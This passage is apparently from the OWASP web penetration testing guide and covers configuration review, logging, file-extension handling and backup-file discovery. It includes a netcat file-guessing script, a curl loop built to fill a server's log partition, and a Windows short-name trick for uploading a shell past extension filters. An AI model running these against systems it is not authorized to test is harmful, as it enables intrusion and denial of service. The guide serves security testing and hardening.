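Before reviewing individual configurations, it can help to confirm how many distinct servers actually answer for the application. A minimal sketch of the load balancer check described above (curl is assumed and www.example.com is a placeholder) repeats a HEAD request and compares the Date and Server headers across responses:

$ for i in 1 2 3 4 5 ; do curl -s -I http://www.example.com/ | grep -i -e '^Date:' -e '^Server:' ; done   # differing values across runs suggest multiple back-end servers

Cookies injected by the balancer itself, such as the AlteonP cookie mentioned earlier, are also worth recording during the same pass.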
Test Network/Infrastructure Configuration (OTG-CONFIG-001) Summary The intrinsic complexity of interconnected and heterogeneous web server infrastructure, which can include hundreds of web applications, makes configuration management and review a fundamental step in testing and deploying every single application. It takes only a single vulnerability to undermine the security of the entire infrastructure, and even small and seemingly unimportant problems may evolve into severe risks for another application on the same server. In order to address these problems, it is of utmost importance to perform an indepth review of configuration and known security issues, after having mapped the entire architecture. Proper configuration management of the web server infrastructure is very important in order to preserve the security of the application itself. If elements such as the web server software, the back-end database servers, or the authentication servers are not properly reviewed and secured, they might introduce undesired risks or introduce new vulnerabilities that might compromise the application itself. For example, a web server vulnerability that would allow a remote attacker to disclose the source code of the application itself (a vulnerability that has arisen a number of times in both web servers or application servers) could compromise the application, as anonymous users could use the information disclosed in the source code to leverage attacks against the application or its users. The following steps need to be taken to test the configuration management infrastructure: • The different elements that make up the infrastructure need to be determined in order to understand how they interact with a web application and how they affect its security. • All the elements of the infrastructure need to be reviewed in order to make sure that they don’t contain any known vulnerabilities. • A review needs to be made of the administrative tools used to maintain all the different elements. • The authentication systems, need to reviewed in order to assure that they serve the needs of the application and that they cannot be manipulated by external users to leverage access. • A list of defined ports which are required for the application should be maintained and kept under change control. After having mapped the different elements that make up the infrastructure (see Map Network and Application Architecture) it is possible to review the configuration of each element founded and test for any known vulnerabilities. How to Test Known Server Vulnerabilities Vulnerabilities found in the different areas of the application architecture, be it in the web server or in the back end database, can severe- 49 Web Application Penetration Testing ly compromise the application itself. For example, consider a server vulnerability that allows a remote, unauthenticated user to upload files to the web server or even to replace files. This vulnerability could compromise the application, since a rogue user may be able to replace the application itself or introduce code that would affect the back end servers, as its application code would be run just like any other application. Reviewing server vulnerabilities can be hard to do if the test needs to be done through a blind penetration test. In these cases, vulnerabilities need to be tested from a remote site, typically using an automated tool. 
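A hedged starting point for such remote, automated identification (nmap is assumed to be available and authorized for the engagement; the host and port list are illustrative) is a service and version scan of the exposed web ports:

$ nmap -sV -p 80,443,8080,8443 www.example.com   # service/version detection on common web ports

The versions reported should be treated only as input to further research, for the false positive and false negative reasons discussed next.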
However, testing for some vulnerabilities can have unpredictable results on the web server, and testing for others (like those directly involved in denial of service attacks) might not be possible due to the service downtime involved if the test was successful. Some automated tools will flag vulnerabilities based on the web server version retrieved. This leads to both false positives and false negatives. On one hand, if the web server version has been removed or obscured by the local site administrator the scan tool will not flag the server as vulnerable even if it is. On the other hand, if the vendor providing the software does not update the web server version when vulnerabilities are fixed, the scan tool will flag vulnerabilities that do not exist. The latter case is actually very common as some operating system vendors back port patches of security vulnerabilities to the software they provide in the operating system, but do not do a full upload to the latest software version. This happens in most GNU/Linux distributions such as Debian, Red Hat or SuSE. In most cases, vulnerability scanning of an application architecture will only find vulnerabilities associated with the “exposed” elements of the architecture (such as the web server) and will usually be unable to find vulnerabilities associated to elements which are not directly exposed, such as the authentication back ends, the back end database, or reverse proxies in use. Finally, not all software vendors disclose vulnerabilities in a public way, and therefore these weaknesses do not become registered within publicly known vulnerability databases[2]. This information is only disclosed to customers or published through fixes that do not have accompanying advisories. This reduces the usefulness of vulnerability scanning tools. Typically, vulnerability coverage of these tools will be very good for common products (such as the Apache web server, Microsoft’s Internet Information Server, or IBM’s Lotus Domino) but will be lacking for lesser known products. This is why reviewing vulnerabilities is best done when the tester is provided with internal information of the software used, including versions and releases used and patches applied to the software. With this information, the tester can retrieve the information from the vendor itself and analyze what vulnerabilities might be present in the architecture and how they can affect the application itself. When possible, these vulnerabilities can be tested to determine their real effects and to detect if there might be any external elements (such as intrusion detection or prevention systems) that might reduce or negate the possibility of successful exploitation. Testers might even determine, through a configuration review, that the vulnerability is not even present, since it affects a software component that is not in use. It is also worthwhile to note that vendors will sometimes silently fix vulnerabilities and make the fixes available with new software releases. Different vendors will have different release cycles that determine the support they might provide for older releases. A tester with detailed information of the software versions used by the architecture can analyse the risk associated to the use of old software releases that might be unsupported in the short term or are already unsupported. This is critical, since if a vulnerability were to surface in an old software version that is no longer supported, the systems personnel might not be directly aware of it. 
No patches will be ever made available for it and advisories might not list that version as vulnerable as it is no longer supported. Even in the event that they are aware that the vulnerability is present and the system is vulnerable, they will need to do a full upgrade to a new software release, which might introduce significant downtime in the application architecture or might force the application to be re-coded due to incompatibilities with the latest software version. Administrative tools Any web server infrastructure requires the existence of administrative tools to maintain and update the information used by the application. This information includes static content (web pages, graphic files), application source code, user authentication databases, etc. Administrative tools will differ depending on the site, technology, or software used. For example, some web servers will be managed using administrative interfaces which are, themselves, web servers (such as the iPlanet web server) or will be administrated by plain text configuration files (in the Apache case[3]) or use operating-system GUI tools (when using Microsoft’s IIS server or ASP.Net). In most cases the server configuration will be handled using different file maintenance tools used by the web server, which are managed through FTP servers, WebDAV, network file systems (NFS, CIFS) or other mechanisms. Obviously, the operating system of the elements that make up the application architecture will also be managed using other tools. Applications may also have administrative interfaces embedded in them that are used to manage the application data itself (users, content, etc.). After having mapped the administrative interfaces used to manage the different parts of the architecture it is important to review them since if an attacker gains access to any of them he can then compromise or damage the application architecture. To do this it is important to: • Determine the mechanisms that control access to these interfaces and their associated susceptibilities. This information may be available online. • Change the default username and password. Some companies choose not to manage all aspects of their web server applications, but may have other parties managing the content delivered by the web application. This external company might either provide only parts of the content (news updates or promotions) or might manage the web server completely (including content and code). It is common to find administrative interfaces available from the Internet in these situations, since using the Internet is cheaper than providing a dedicated line that will connect the external company to the application infrastructure through a management-only interface. In this situation, it is very important to test if the administrative interfaces can be vulnerable to attacks. References [1] WebSEAL, also known as Tivoli Authentication Manager, is a re- 50 Web Application Penetration Testing verse proxy from IBM which is part of the Tivoli framework. [2] Such as Symantec’s Bugtraq, ISS’ X-Force, or NIST’s National Vulnerability Database (NVD). [3] There are some GUI-based administration tools for Apache (like NetLoony) but they are not in widespread use yet. Test Application Platform Configuration (OTG-CONFIG-002) Summary Proper configuration of the single elements that make up an application architecture is important in order to prevent mistakes that might compromise the security of the whole architecture. 
Configuration review and testing is a critical task in creating and maintaining an architecture. This is because many different systems will be usually provided with generic configurations that might not be suited to the task they will perform on the specific site they’re installed on. While the typical web and application server installation will contain a lot of functionality (like application examples, documentation, test pages) what is not essential should be removed before deployment to avoid post-install exploitation. How to Test Black Box Testing Sample and known files and directories Many web servers and application servers provide, in a default installation, sample applications and files that are provided for the benefit of the developer and in order to test that the server is working properly right after installation. However, many default web server applications have been later known to be vulnerable. This was the case, for example, for CVE-1999-0449 (Denial of Service in IIS when the Exair sample site had been installed), CAN-2002-1744 (Directory traversal vulnerability in CodeBrws.asp in Microsoft IIS 5.0), CAN-2002-1630 (Use of sendmail.jsp in Oracle 9iAS), or CAN-2003-1172 (Directory traversal in the view-source sample in Apache’s Cocoon). CGI scanners include a detailed list of known files and directory samples that are provided by different web or application servers and might be a fast way to determine if these files are present. However, the only way to be really sure is to do a full review of the contents of the web server or application server and determine of whether they are related to the application itself or not. Comment review It is very common, and even recommended, for programmers to include detailed comments on their source code in order to allow for other programmers to better understand why a given decision was taken in coding a given function. Programmers usually add comments when developing large web-based applications. However, comments included inline in HTML code might reveal internal information that should not be available to an attacker. Sometimes, even source code is commented out since a functionality is no longer required, but this comment is leaked out to the HTML pages returned to the users unintentionally. Comment review should be done in order to determine if any information is being leaked through comments. This review can only be thoroughly done through an analysis of the web server static and dynamic content and through file searches. It can be useful to browse the site either in an automatic or guided fashion and store all the content retrieved. This retrieved content can then be searched in order to analyse any HTML comments available in the code. Gray Box Testing Configuration review The web server or application server configuration takes an important role in protecting the contents of the site and it must be carefully reviewed in order to spot common configuration mistakes. Obviously, the recommended configuration varies depending on the site policy, and the functionality that should be provided by the server software. In most cases, however, configuration guidelines (either provided by the software vendor or external parties) should be followed to determine if the server has been properly secured. It is impossible to generically say how a server should be configured, however, some common guidelines should be taken into account: • Only enable server modules (ISAPI extensions in the case of IIS) that are needed for the application. 
This reduces the attack surface since the server is reduced in size and complexity as software modules are disabled. It also prevents vulnerabilities that might appear in the vendor software from affecting the site if they are only present in modules that have been already disabled. • Handle server errors (40x or 50x) with custom-made pages instead of with the default web server pages. Specifically make sure that any application errors will not be returned to the end-user and that no code is leaked through these errors since it will help an attacker. It is actually very common to forget this point since developers do need this information in pre-production environments. • Make sure that the server software runs with minimized privileges in the operating system. This prevents an error in the server software from directly compromising the whole system, although an attacker could elevate privileges once running code as the web server. • Make sure the server software properly logs both legitimate access and errors. • Make sure that the server is configured to properly handle overloads and prevent Denial of Service attacks. Ensure that the server has been performance-tuned properly. • Never grant non-administrative identities (with the exception of NT SERVICE\WMSvc) access to applicationHost.config, redirection. config, and administration.config (either Read or Write access). This includes Network Service, IIS_IUSRS, IUSR, or any custom identity used by IIS application pools. IIS worker processes are not meant to access any of these files directly. • Never share out applicationHost.config, redirection.config, and administration.config on the network. When using Shared Configuration, prefer to export applicationHost.config to another location (see the section titled “Setting Permissions for Shared Configuration). • Keep in mind that all users can read .NET Framework machine.config and root web.config files by default. Do not store sensitive information in these files if it should be for administrator eyes only. • Encrypt sensitive information that should be read by the IIS worker processes only and not by other users on the machine. • Do not grant Write access to the identity that the Web server uses to access the shared applicationHost.config. This identity should have only Read access. • Use a separate identity to publish applicationHost.config to the share. Do not use this identity for configuring access to the shared configuration on the Web servers. • Use a strong password when exporting the encryption keys for use with shared -configuration. 51 Web Application Penetration Testing • Maintain restricted access to the share containing the shared configuration and encryption keys. If this share is compromised, an attacker will be able to read and write any IIS configuration for your Web servers, redirect traffic from your Web site to malicious sources, and in some cases gain control of all web servers by loading arbitrary code into IIS worker processes. • Consider protecting this share with firewall rules and IPsec policies to allow only the member web servers to connect. Logging Logging is an important asset of the security of an application architecture, since it can be used to detect flaws in applications (users constantly trying to retrieve a file that does not really exist) as well as sustained attacks from rogue users. Logs are typically properly generated by web and other server software. 
It is not common to find applications that properly log their actions to a log and, when they do, the main intention of the application logs is to produce debugging output that could be used by the programmer to analyze a particular error. In both cases (server and application logs) several issues should be tested and analysed based on the log contents: • Do the logs contain sensitive information? • Are the logs stored in a dedicated server? • Can log usage generate a Denial of Service condition? • How are they rotated? Are logs kept for the sufficient time? • How are logs reviewed? Can administrators use these reviews to detect targeted attacks? • How are log backups preserved? • Is the data being logged data validated (min/max length, chars etc) prior to being logged? Sensitive information in logs Some applications might, for example, use GET requests to forward form data which will be seen in the server logs. This means that server logs might contain sensitive information (such as usernames as passwords, or bank account details). This sensitive information can be misused by an attacker if they obtained the logs, for example, through administrative interfaces or known web server vulnerabilities or misconfiguration (like the well-known server-status misconfiguration in Apache-based HTTP servers ). Event logs will often contain data that is useful to an attacker (information leakage) or can be used directly in exploits: • Debug information • Stack traces • Usernames • System component names • Internal IP addresses • Less sensitive personal data (e.g. email addresses, postal addresses and telephone numbers associated with named individuals) • Business data Also, in some jurisdictions, storing some sensitive information in log files, such as personal data, might oblige the enterprise to apply the data protection laws that they would apply to their back-end databases to log files too. And failure to do so, even unknowingly, might carry penalties under the data protection laws that apply. A wider list of sensitive information is: • Application source code • Session identification values • Access tokens • Sensitive personal data and some forms of personally identifiable information (PII) • Authentication passwords • Database connection strings • Encryption keys • Bank account or payment card holder data • Data of a higher security classification than the logging system is allowed to store • Commercially-sensitive information • Information it is illegal to collect in the relevant jurisdiction • Information a user has opted out of collection, or not consented to e.g. use of do not track, or where consent to collect has expired Log location Typically servers will generate local logs of their actions and errors, consuming the disk of the system the server is running on. However, if the server is compromised its logs can be wiped out by the intruder to clean up all the traces of its attack and methods. If this were to happen the system administrator would have no knowledge of how the attack occurred or where the attack source was located. Actually, most attacker tool kits include a log zapper that is capable of cleaning up any logs that hold given information (like the IP address of the attacker) and are routinely used in attacker’s system-level root kits. Consequently, it is wiser to keep logs in a separate location and not in the web server itself. 
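As an illustrative sketch only, and one that is as dangerous in production as the text above warns, a sustained series of requests with large query strings can be fired while the log partition is watched; curl and df are assumed, www.example.com is a placeholder, and the request count is arbitrary:

$ pad=$(head -c 2000 /dev/zero | tr '\0' 'A')    # a 2000-character dummy parameter value
$ for i in $(seq 1 10000) ; do curl -s -o /dev/null "http://www.example.com/?junk=$pad" ; done
$ df -h /var/log                                 # compare usage before and after the run

If the partition that fills up also hosts the operating system or the application, the logging configuration needs to be revisited as described above.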
This also makes it easier to aggregate logs from different sources that refer to the same application (such as those of a web server farm) and it also makes it easier to do log analysis (which can be CPU intensive) without affecting the server itself. Log storage Logs can introduce a Denial of Service condition if they are not properly stored. Any attacker with sufficient resources could be able to produce a sufficient number of requests that would fill up the allocated space to log files, if they are not specifically prevented from doing so. However, if the server is not properly configured, the log files will be stored in the same disk partition as the one used for the operating system software or the application itself. This means that if the disk were to be filled up the operating system or the application might fail because it is unable to write on disk. Typically in UNIX systems logs will be located in /var (although some server installations might reside in /opt or /usr/local) and it is important to make sure that the directories in which logs are stored are in a separate partition. In some cases, and in order to prevent the system logs from being affected, the log directory of the server software itself (such as /var/log/apache in the Apache web server) should be stored in a dedicated partition. This is not to say that logs should be allowed to grow to fill up the file system they reside in. Growth of server logs should be monitored in order to detect this condition since it may be indicative of an attack. Testing this condition is as easy, and as dangerous in production environments, as firing off a sufficient and sustained number of requests to see if these requests are logged and if there is a possibility to fill up the log partition through these requests. In some environments where QUERY_STRING parameters are also logged regardless of whether they are produced through GET or POST requests, big que- 52 Web Application Penetration Testing ries can be simulated that will fill up the logs faster since, typically, a single request will cause only a small amount of data to be logged, such as date and time, source IP address, URI request, and server result. Log rotation Most servers (but few custom applications) will rotate logs in order to prevent them from filling up the file system they reside on. The assumption when rotating logs is that the information in them is only necessary for a limited amount of time. This feature should be tested in order to ensure that: • Logs are kept for the time defined in the security policy, not more and not less. • Logs are compressed once rotated (this is a convenience, since it will mean that more logs will be stored for the same available disk space). • File system permission of rotated log files are the same (or stricter) that those of the log files itself. For example, web servers will need to write to the logs they use but they don’t actually need to write to rotated logs, which means that the permissions of the files can be changed upon rotation to prevent the web server process from modifying these. Some servers might rotate logs when they reach a given size. If this happens, it must be ensured that an attacker cannot force logs to rotate in order to hide his tracks. Log Access Control Event log information should never be visible to end users. Even web administrators should not be able to see such logs since it breaks separation of duty controls. 
Ensure that any access control schema that is used to protect access to raw logs and any applications providing capabilities to view or search the logs is not linked with access control schemas for other application user roles. Neither should any log data be viewable by unauthenticated users. Log review Review of logs can be used for more than extraction of usage statistics of files in the web servers (which is typically what most log-based application will focus on), but also to determine if attacks take place at the web server. In order to analyze web server attacks the error log files of the server need to be analyzed. Review should concentrate on: • 40x (not found) error messages. A large amount of these from the same source might be indicative of a CGI scanner tool being used against the web server • 50x (server error) messages. These can be an indication of an attacker abusing parts of the application which fail unexpectedly. For example, the first phases of a SQL injection attack will produce these error message when the SQL query is not properly constructed and its execution fails on the back end database. Log statistics or analysis should not be generated, nor stored, in the same server that produces the logs. Otherwise, an attacker might, through a web server vulnerability or improper configuration, gain access to them and retrieve similar information as would be disclosed by log files themselves. References [1] Apache • Apache Security, by Ivan Ristic, O’reilly, March 2005. • Apache Security Secrets: Revealed (Again), Mark Cox, November 2003 - http://www.awe.com/mark/apcon2003/ • Apache Security Secrets: Revealed, ApacheCon 2002, Las Vegas, Mark J Cox, October 2002 - http://www.awe.com/mark/apcon2002 • Performance Tuning - http://httpd.apache.org/docs/misc/ perf-tuning.html [2] Lotus Domino • Lotus Security Handbook, William Tworek et al., April 2004, available in the IBM Redbooks collection • Lotus Domino Security, an X-force white-paper, Internet Security Systems, December 2002 • Hackproofing Lotus Domino Web Server, David Litchfield, October 2001, • NGSSoftware Insight Security Research, available at http://www. nextgenss.com [3] Microsoft IIS • IIS 6.0 Security, by Rohyt Belani, Michael Muckin, - http://www. securityfocus.com/print/infocus/1765 • IIS 7.0 Securing Configuration - http://technet.microsoft.com/enus/library/dd163536.aspx • Securing Your Web Server (Patterns and Practices), Microsoft Corporation, January 2004 • IIS Security and Programming Countermeasures, by Jason Coombs • From Blueprint to Fortress: A Guide to Securing IIS 5.0, by John Davis, Microsoft Corporation, June 2001 • Secure Internet Information Services 5 Checklist, by Michael Howard, Microsoft Corporation, June 2000 • “INFO: Using URLScan on IIS” - http://support.microsoft.com/default.aspx?scid=307608 [4] Red Hat’s (formerly Netscape’s) iPlanet • Guide to the Secure Configuration and Administration of iPlanet Web Server, Enterprise Edition 4.1, by James M Hayes, The Network Applications Team of the Systems and Network Attack Center (SNAC), NSA, January 2001 [5] WebSphere • IBM WebSphere V5.0 Security, WebSphere Handbook Series, by Peter Kovari et al., IBM, December 2002. • IBM WebSphere V4.0 Advanced Edition Security, by Peter Kovari et al., IBM, March 2002. 
[6] General • Logging Cheat Sheet, OWASP • SP 800-92 Guide to Computer Security Log Management, NIST • PCI DSS v2.0 Requirement 10 and PA-DSS v2.0 Requirement 4, PCI Security Standards Council [7] Generic: • CERT Security Improvement Modules: Securing Public Web Servers - http://www.cert.org/security-improvement/ • Apache Security Configuration Document, InterSect Alliance http://www.intersectalliance.com/projects/ApacheConfig/index. html • “How To: Use IISLockdown.exe” - http://msdn.microsoft.com/library/en-us/secmod/html/secmod113.asp Test File Extensions Handling for Sensitive Information (OTG-CONFIG-003) Summary File extensions are commonly used in web servers to easily determine which technologies, languages and plugins must be used to fulfill the web request. While this behavior is consistent with RFCs and Web 53 Web Application Penetration Testing Standards, using standard file extensions provides the penetration tester useful information about the underlying technologies used in a web appliance and greatly simplifies the task of determining the attack scenario to be used on particular technologies. In addition, mis-configuration of web servers could easily reveal confidential information about access credentials. The following file extensions should never be returned by a web server, since they are related to files which may contain sensitive information or to files for which there is no reason to be served. Extension checking is often used to validate files to be uploaded, which can lead to unexpected results because the content is not what is expected, or because of unexpected OS file name handling. The following file extensions are related to files which, when accessed, are either displayed or downloaded by the browser. Therefore, files with these extensions must be checked to verify that they are indeed supposed to be served (and are not leftovers), and that they do not contain sensitive information. Determining how web servers handle requests corresponding to files having different extensions may help in understanding web server behavior depending on the kind of files that are accessed. For example, it can help to understand which file extensions are returned as text or plain versus those that cause execution on the server side. The latter are indicative of technologies, languages or plugins that are used by web servers or application servers, and may provide additional insight on how the web application is engineered. For example, a “.pl” extension is usually associated with server-side Perl support. However, the file extension alone may be deceptive and not fully conclusive. For example, Perl server-side resources might be renamed to conceal the fact that they are indeed Perl related. See the next section on “web server components” for more on identifying server side technologies and components. How to Test Forced browsing Submit http[s] requests involving different file extensions and verify how they are handled. The verification should be on a per web directory basis. Verify directories that allow script execution. Web server directories can be identified by vulnerability scanners, which look for the presence of well-known directories. In addition, mirroring the web site structure allows the tester to reconstruct the tree of web directories served by the application. If the web application architecture is load-balanced, it is important to assess all of the web servers. This may or may not be easy, depending on the configuration of the balancing infrastructure. 
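Whichever servers end up in scope, the per-directory, per-extension check itself is easy to script. The sketch below requests the same base resource with a set of extensions and records the status code and Content-Type returned; the host name and resource are placeholders, and the extension list should be tailored to the technologies identified so far.

#!/bin/bash
# Sketch: submit requests for the same base name with different extensions and
# record how each is handled. Host and resource names are placeholders.
base='https://www.example.com/app/login'
for ext in php inc asp aspx jsp pl txt old bak zip; do
    printf '%s.%s\t' "$base" "$ext"
    curl -k -s -o /dev/null -w '%{http_code}\t%{content_type}\n' "$base.$ext"
done
# A 200 response with a text/plain Content-Type for a normally executable
# extension suggests the source is being served rather than executed.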
In an infrastructure with redundant components there may be slight variations in the configuration of individual web or application servers. This may happen if the web architecture employs heterogeneous technologies (think of a set of IIS and Apache web servers in a load-balancing configuration, which may introduce slight asymmetric behavior between them, and possibly different vulnerabilities). ‘Example: The tester has identified the existence of a file named connection.inc. Trying to access it directly gives back its contents, which are: mysql_connect(“127.0.0.1”, “root”, “”) or die(“Could not connect”); ?> The tester determines the existence of a MySQL DBMS back end, and the (weak) credentials used by the web application to access it. • .asa • .inc • .zip, .tar, .gz, .tgz, .rar, ...: (Compressed) archive files • .java: No reason to provide access to Java source files • .txt: Text files • .pdf: PDF documents • .doc, .rtf, .xls, .ppt, ...: Office documents • .bak, .old and other extensions indicative of backup files (for example: ~ for Emacs backup files) The list given above details only a few examples, since file extensions are too many to be comprehensively treated here. Refer to http://filext. com/ for a more thorough database of extensions. To identify files having a given extensions a mix of techniques can be employed. THese techniques can include Vulnerability Scanners, spidering and mirroring tools, manually inspecting the application (this overcomes limitations in automatic spidering), querying search engines (see Testing: Spidering and googling). See also Testing for Old, Backup and Unreferenced Files which deals with the security issues related to “forgotten” files. File Upload Windows 8.3 legacy file handling can sometimes be used to defeat file upload filters Usage Examples: file.phtml gets processed as PHP code FILE~1.PHT is served, but not processed by the PHP ISAPI handler shell.phPWND can be uploaded SHELL~1.PHP will be expanded and returned by the OS shell, then processed by the PHP ISAPI handler Gray Box testing Performing white box testing against file extensions handling amounts to checking the configurations of web servers or application servers taking part in the web application architecture, and verifying how they are instructed to serve different file extensions. If the web application relies on a load-balanced, heterogeneous infrastructure, determine whether this may introduce different behavior. Tools Vulnerability scanners, such as Nessus and Nikto check for the ex- 54 Web Application Penetration Testing istence of well-known web directories. They may allow the tester to download the web site structure, which is helpful when trying to determine the configuration of web directories and how individual file extensions are served. Other tools that can be used for this purpose include: • wget - http://www.gnu.org/software/wget • curl - http://curl.haxx.se • google for “web mirroring tools”. Review Old, Backup and Unreferenced Files for Sensitive Information (OTG-CONFIG-004) Summary While most of the files within a web server are directly handled by the server itself, it isn’t uncommon to find unreferenced or forgotten files that can be used to obtain important information about the infrastructure or the credentials. Most common scenarios include the presence of renamed old versions of modified files, inclusion files that are loaded into the language of choice and can be downloaded as source, or even automatic or manual backups in form of compressed archives. 
Backup files can also be generated automatically by the underlying file system the application is hosted on, a feature usually referred to as “snapshots”. All these files may grant the tester access to inner workings, back doors, administrative interfaces, or even credentials to connect to the administrative interface or the database server. An important source of vulnerability lies in files which have nothing to do with the application, but are created as a consequence of editing application files, or after creating on-the-fly backup copies, or by leaving in the web tree old files or unreferenced files.Performing in-place editing or other administrative actions on production web servers may inadvertently leave backup copies, either generated automatically by the editor while editing files, or by the administrator who is zipping a set of files to create a backup. It is easy to forget such files and this may pose a serious security threat to the application. That happens because backup copies may be generated with file extensions differing from those of the original files. A .tar, .zip or .gz archive that we generate (and forget...) has obviously a different extension, and the same happens with automatic copies created by many editors (for example, emacs generates a backup copy named file~ when editing file). Making a copy by hand may produce the same effect (think of copying file to file.old). The underlying file system the application is on could be making “snapshots” of your application at different points in time without your knowledge, which may also be accessible via the web, posing a similar but different “backup file” style threat to your application. As a result, these activities generate files that are not needed by the application and may be handled differently than the original file by the web server. For example, if we make a copy of login.asp named login.asp.old, we are allowing users to download the source code of login.asp. This is because login.asp.old will be typically served as text or plain, rather than being executed because of its extension. In other words, accessing login.asp causes the execution of the server-side code of login.asp, while accessing login.asp.old causes the content of login.asp.old (which is, again, server-side code) to be plainly returned to the user and displayed in the browser. This may pose security risks, since sensitive information may be revealed. Generally, exposing server side code is a bad idea. Not only are you unnecessarily exposing business logic, but you may be unknowingly revealing application-related information which may help an attacker (path names, data structures, etc.). Not to mention the fact that there are too many scripts with embedded username and password in clear text (which is a careless and very dangerous practice). Other causes of unreferenced files are due to design or configuration choices when they allow diverse kind of application-related files such as data files, configuration files, log files, to be stored in file system directories that can be accessed by the web server. These files have normally no reason to be in a file system space that could be accessed via web, since they should be accessed only at the application level, by the application itself (and not by the casual user browsing around). 
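As a concrete illustration of the login.asp.old scenario above, leftover copies of a known page can be probed directly. The sketch below appends common backup suffixes to a page name identified earlier; the target URL is a placeholder and the suffix list is only a starting point (the guessing techniques described later in this section generate far larger candidate lists).

#!/bin/bash
# Sketch: probe for leftover backup copies of a known page by appending common
# backup suffixes. The target URL is a placeholder.
target='http://www.example.com/login.asp'
for suffix in .old .bak .orig .save .tmp .txt .zip .tar.gz '~'; do
    url="${target}${suffix}"
    code=$(curl -s -o /dev/null -w '%{http_code}' "$url")
    printf '%s\t%s\n' "$code" "$url"
done
# Any 200 response should be inspected manually: if the body contains
# server-side source code, the backup copy is being served as plain text.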
Threats Old, backup and unreferenced files present various threats to the security of a web application: • Unreferenced files may disclose sensitive information that can facilitate a focused attack against the application; for example include files containing database credentials, configuration files containing references to other hidden content, absolute file paths, etc. • Unreferenced pages may contain powerful functionality that can be used to attack the application; for example an administration page that is not linked from published content but can be accessed by any user who knows where to find it. • Old and backup files may contain vulnerabilities that have been fixed in more recent versions; for example viewdoc.old.jsp may contain a directory traversal vulnerability that has been fixed in viewdoc.jsp but can still be exploited by anyone who finds the old version. • Backup files may disclose the source code for pages designed to execute on the server; for example requesting viewdoc.bak may return the source code for viewdoc.jsp, which can be reviewed for vulnerabilities that may be difficult to find by making blind requests to the executable page. While this threat obviously applies to scripted languages, such as Perl, PHP, ASP, shell scripts, JSP, etc., it is not limited to them, as shown in the example provided in the next bullet. • Backup archives may contain copies of all files within (or even outside) the webroot. This allows an attacker to quickly enumerate the entire application, including unreferenced pages, source code, include files, etc. For example, if you forget a file named myservlets. jar.old file containing (a backup copy of) your servlet implementation classes, you are exposing a lot of sensitive information which is susceptible to decompilation and reverse engineering. • In some cases copying or editing a file does not modify the file extension, but modifies the file name. This happens for example in Windows environments, where file copying operations generate file names prefixed with “Copy of “ or localized versions of this string. Since the file extension is left unchanged, this is not a case where an executable file is returned as plain text by the web server, and therefore not a case of source code disclosure. However, these files too are dangerous because there is a chance that they include obsolete and incorrect logic that, when invoked, could trigger application errors, which might yield valuable information to an attacker, if diagnostic message display is enabled. • Log files may contain sensitive information about the activities of application users, for example sensitive data passed in URL parameters, session IDs, URLs visited (which may disclose additional 55 Web Application Penetration Testing unreferenced content), etc. Other log files (e.g. ftp logs) may contain sensitive information about the maintenance of the application by system administrators. • File system snapshots may contain copies of the code that contain vulnerabilities that have been fixed in more recent versions. For example /.snapshot/monthly.1/view.php may contain a directory traversal vulnerability that has been fixed in /view.php but can still be exploited by anyone who finds the old version. How to Test Black Box Testing Testing for unreferenced files uses both automated and manual techniques, and typically involves a combination of the following: Inference from the naming scheme used for published content Enumerate all of the application’s pages and functionality. 
This can be done manually using a browser, or using an application spidering tool. Most applications use a recognizable naming scheme, and organize resources into pages and directories using words that describe their function. From the naming scheme used for published content, it is often possible to infer the name and location of unreferenced pages. For example, if a page viewuser.asp is found, then look also for edituser. asp, adduser.asp and deleteuser.asp. If a directory /app/user is found, then look also for /app/admin and /app/manager. Other clues in published content Many web applications leave clues in published content that can lead to the discovery of hidden pages and functionality. These clues often appear in the source code of HTML and JavaScript files. The source code for all published content should be manually reviewed to identify clues about other pages and functionality. For example: Programmers’ comments and commented-out sections of source code may refer to hidden content: JavaScript may contain page links that are only rendered within the user’s GUI under certain circumstances: var adminUser=false; : if (adminUser) menu.add (new menuItem (“Maintain users”, “/ admin/useradmin.jsp”)); HTML pages may contain FORMs that have been hidden by disabling the SUBMIT element: Another source of clues about unreferenced directories is the /robots. txt file used to provide instructions to web robots: User-agent: * Disallow: /Admin Disallow: /uploads Disallow: /backup Disallow: /~jbloggs Disallow: /include Blind guessing In its simplest form, this involves running a list of common file names through a request engine in an attempt to guess files and directories that exist on the server. The following netcat wrapper script will read a wordlist from stdin and perform a basic guessing attack: #!/bin/bash server=www.targetapp.com port=80 while read url do echo -ne “$url\t” echo -e “GET /$url HTTP/1.0\nHost: $server\n” | netcat $server $port | head -1 done | tee outputfile Depending upon the server, GET may be replaced with HEAD for faster results. The output file specified can be grepped for “interesting” response codes. The response code 200 (OK) usually indicates that a valid resource has been found (provided the server does not deliver a custom “not found” page using the 200 code). But also look out for 301 (Moved), 302 (Found), 401 (Unauthorized), 403 (Forbidden) and 500 (Internal error), which may also indicate resources or directories that are worthy of further investigation. The basic guessing attack should be run against the webroot, and also against all directories that have been identified through other enumeration techniques. More advanced/effective guessing attacks can be performed as follows: • Identify the file extensions in use within known areas of the application (e.g. jsp, aspx, html), and use a basic wordlist appended with each of these extensions (or use a longer list of common extensions if resources permit). • For each file identified through other enumeration techniques, create a custom wordlist derived from that filename. Get a list of common file extensions (including ~, bak, txt, src, dev, old, inc, orig, copy, tmp, etc.) and use each extension before, after, and instead of, the extension of the actual file name. Note: Windows file copying operations generate file names prefixed with “Copy of “ or localized versions of this string, hence they do not change file extensions. 
While “Copy of ” files typically do 56 Web Application Penetration Testing not disclose source code when accessed, they might yield valuable information in case they cause errors when invoked. Information obtained through server vulnerabilities and misconfiguration The most obvious way in which a misconfigured server may disclose unreferenced pages is through directory listing. Request all enumerated directories to identify any which provide a directory listing. Numerous vulnerabilities have been found in individual web servers which allow an attacker to enumerate unreferenced content, for example: • Apache ?M=D directory listing vulnerability. • Various IIS script source disclosure vulnerabilities. • IIS WebDAV directory listing vulnerabilities. Use of publicly available information Pages and functionality in Internet-facing web applications that are not referenced from within the application itself may be referenced from other public domain sources. There are various sources of these references: • Pages that used to be referenced may still appear in the archives of Internet search engines. For example, 1998results.asp may no longer be linked from a company’s website, but may remain on the server and in search engine databases. This old script may contain vulnerabilities that could be used to compromise the entire site. The site: Google search operator may be used to run a query only against the domain of choice, such as in: site:www. example.com. Using search engines in this way has lead to a broad array of techniques which you may find useful and that are described in the Google Hacking section of this Guide. Check it to hone your testing skills via Google. Backup files are not likely to be referenced by any other files and therefore may have not been indexed by Google, but if they lie in browsable directories the search engine might know about them. • In addition, Google and Yahoo keep cached versions of pages found by their robots. Even if 1998results.asp has been removed from the target server, a version of its output may still be stored by these search engines. The cached version may contain references to, or clues about, additional hidden content that still remains on the server. • Content that is not referenced from within a target application may be linked to by third-party websites. For example, 